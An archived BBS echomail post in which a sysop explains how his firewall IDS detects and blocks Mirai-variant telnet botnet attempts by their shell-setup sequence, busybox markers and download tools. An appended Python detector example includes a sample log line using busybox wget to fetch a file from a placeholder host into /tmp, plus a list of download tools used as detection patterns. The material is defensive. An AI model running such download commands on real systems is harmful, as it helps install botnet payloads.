
Just a sample of the Echomail archive

Cooperative anarchy at its finest, still active today. Darkrealms is the Zone 1 Hub.

   BBS_CARNIVAL      Your BBS software rules and others suck      5,461 messages   


   Message 3,397 of 5,461   
   mark lewis to Nick Andre   
   Bug in Renegade's Renemail   
   28 Jun 18 08:31:34   
   
    On 2018 Jun 26 15:09:12, you wrote to Sean Dennis:   
      
    NA> If a non-ANSI user calls here, I know that 99% of the time its a   
    NA> script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If   
    NA> you answer wrong, your IP address is blacklisted in the NET2BBS "kill"   
    NA> file. A blacklisted system is trapped and disconnected before the BBS   
    NA> loads. I write a separate process that resets the kill file once a   
    NA> week in the case of a false-positive.   
      
   that's similar to what i do here except i use an IDS on my firewall... ISP   
   issued modems are shit... just barely enough to call them a   
   modem/firewall/router... we use ours in bridge mode and have our own dedicated   
   firewall/router machine protecting the three networks here... this firewall   
   being one of smoothwall, ipfire, pfSense and similar... we chose ours because   
   we can customize it if we choose... the IDS comes with but the automated   
   dropping of unwanted connections is our custom addition...   
      
   since i have frontdoor running and answering the connection requests on   
   telnet, it answers and logs the "DFRS" (data from ring signal)... that should   
   be the caller-id stuff but on telnet, with these automated mirai variants,   
   they just spew their credentials and then try to set up their shell... it is   
   because of frontdoor that i was able to see what was going on... most bbses   
   hide that data... so anyway, once i knew what was going on, i wrote a few IDS   
   rules to detect these connections... i followed a few rules, though...   
      
     1. we don't care what name and password they spew.   
     2. we DO care if they try to set up their shell.   
     3. shell setup is generally always the same   
        enable.system.shell.sh   
        (dots used for spaces so as to not trip IDS)   
     4. after the above they generally try to load busybox   
        with some fake module or program call. this call   
        is simply a delimiter so they can see when their   
        attempt is finished.   
     5. sometimes, instead of loading busybox, they try   
        to download scripts from somewhere else via tools   
        like fgrep, curl, wget, ftpget, tftp, and even echo.   
      
   so with the above, we have five IDS rules... one to detect each stage of the   
   command shell setup attempt... that's really all it takes but we do track the   
   fake module or program names they try to initiate... that's how the thing got   
   its name and how the skiddies keep them separated...   
      
   in 2016, there were 12 unique variants.   
   in 2017, there were 30 new unique variants.   
   in 2018, there have been at least 73 new unique variants.   
      
   the most notable thing is that by running the IDS, we're able to detect these   
   attempts and stop them in the firewall before they even get a chance to get   
   into the network... sure, the initial part is being fed to the mailer but as   
   soon as the IDS qualifies the traffic as a mirai variant, it drops the   
   connection via iptables rules... right now we have rules for each of the   
   unique modules which we used as our trigger to block the connection but it is   
   just about to the point where we don't even care about them any more... we   
   could drop the connection just based on the attempt to set up the shell which   
   would reduce our rule set to only 4 rules instead of the current 115 we have   
   in place...   
      
   there used to be a lot more attempts as the skiddies attempted to build their   
   botnets... those attempts have dropped a lot since the beginning... there's   
   only maybe 5 unique variants that are active... at least going by what is seen   
   over here... sometimes an older one will come around and we still see some   
   mirai attempts... one of the funniest ones is using "anarchy" as their fake   
   module but the actual funny part is they're trying to load "SH" for their   
   shell instead of "sh"... we all know how *nix systems are case sensitive so we   
   know this won't work but it could be a second round attempt where the first   
   round may have gotten in and created a "SH" shell... i dunno but i'm glad to   
   be having my firewall performing this analysis and blocking rather than   
   submitting my server to the abuse... that one IDS installation on the firewall   
   is protecting a number of bbses and they're very happy they don't have to do   
   the work of analyzing and blocking these skiddie attempts...   
      
   at one point in time, our firewall was blocking over 4000 unique IPs that were   
   known to be infected with a mirai variant... the attempts have fallen off a   
   whole lot and today we're tracking less than 1000 unique IPs hitting here... i   
   want to suspect the skids are actually reading their logs and seeing what BBS   
   and mailer logons look like... i want to suspect they are adjusting their code   
   to detect those and drop the connection on their own since they can't get in   
   and do anything... i dunno... maybe it is all just a dream...   
      
   )\/(ark   
      
   Always Mount a Scratch Monkey   
   Do you manage your own servers? If you are not running an IDS/IPS yer doin' it   
   wrong...   
   ... be kind to your four footed friends...   
   ---   
    * Origin:  (1:3634/12.73)   
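The staged detection the post describes, written out as an added Python example (not the author's actual IDS rules, which live in his firewall): credentials are ignored, the enable/system/shell/sh sequence is matched case-insensitively so an "SH" attempt is caught too, the busybox "module" name is recorded as the variant marker, and any of the listed download tools is flagged. The log lines, IP, password and marker name "DEMOX" are constructed placeholders.

```python
import re

# Shell-setup tokens in the order the bots send them (rule 3), and the
# download tools from rule 5. Credential lines get no rule at all (rule 1).
SHELL_SETUP = ("enable", "system", "shell", "sh")
DOWNLOAD_TOOLS = {"fgrep", "curl", "wget", "ftpget", "tftp", "echo"}
BUSYBOX_RE = re.compile(r"(?:^|/)busybox\s+(\S+)")

# Constructed sample of one session as a telnet listener might log it ("DFRS"
# as in the post). IP, password, marker and download host are made up.
SAMPLE_SESSION = [
    "203.0.113.7 DFRS: root",
    "203.0.113.7 DFRS: not-a-real-password",
    "203.0.113.7 DFRS: enable",
    "203.0.113.7 DFRS: system",
    "203.0.113.7 DFRS: shell",
    "203.0.113.7 DFRS: SH",
    "203.0.113.7 DFRS: /bin/busybox DEMOX",
    "203.0.113.7 DFRS: /bin/busybox wget http://192.0.2.10/x -O /tmp/x",
]

def classify(cmd):
    """Map one logged command to (stage, detail), or None for lines we ignore."""
    word = cmd.strip()
    if word.lower() in SHELL_SETUP:          # case-insensitive: "SH" counts as "sh"
        return "shell-setup", word.lower()
    tools = {t.rsplit("/", 1)[-1] for t in word.split()} & DOWNLOAD_TOOLS
    if tools:                                # rule 5: fetching a script from elsewhere
        return "download", sorted(tools)[0]
    m = BUSYBOX_RE.search(word)
    if m:                                    # rule 4: the fake module name is the marker
        return "busybox-marker", m.group(1)
    return None

def analyze_session(lines):
    """Walk one session in order; block once the shell-setup sequence completes."""
    idx, marker, tools = 0, None, []
    for line in lines:
        hit = classify(line.split("DFRS:", 1)[-1])
        if hit is None:
            continue
        stage, detail = hit
        if stage == "shell-setup" and idx < len(SHELL_SETUP) and detail == SHELL_SETUP[idx]:
            idx += 1                         # tokens must arrive in the expected order
        elif stage == "busybox-marker" and marker is None:
            marker = detail
        elif stage == "download":
            tools.append(detail)
    # rule 2: a completed enable/system/shell/sh sequence alone is enough to drop
    return {"block": idx == len(SHELL_SETUP), "marker": marker, "tools": tools}
```

Feeding each session's `marker` into a counter gives the per-year unique-variant tallies the post keeps.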
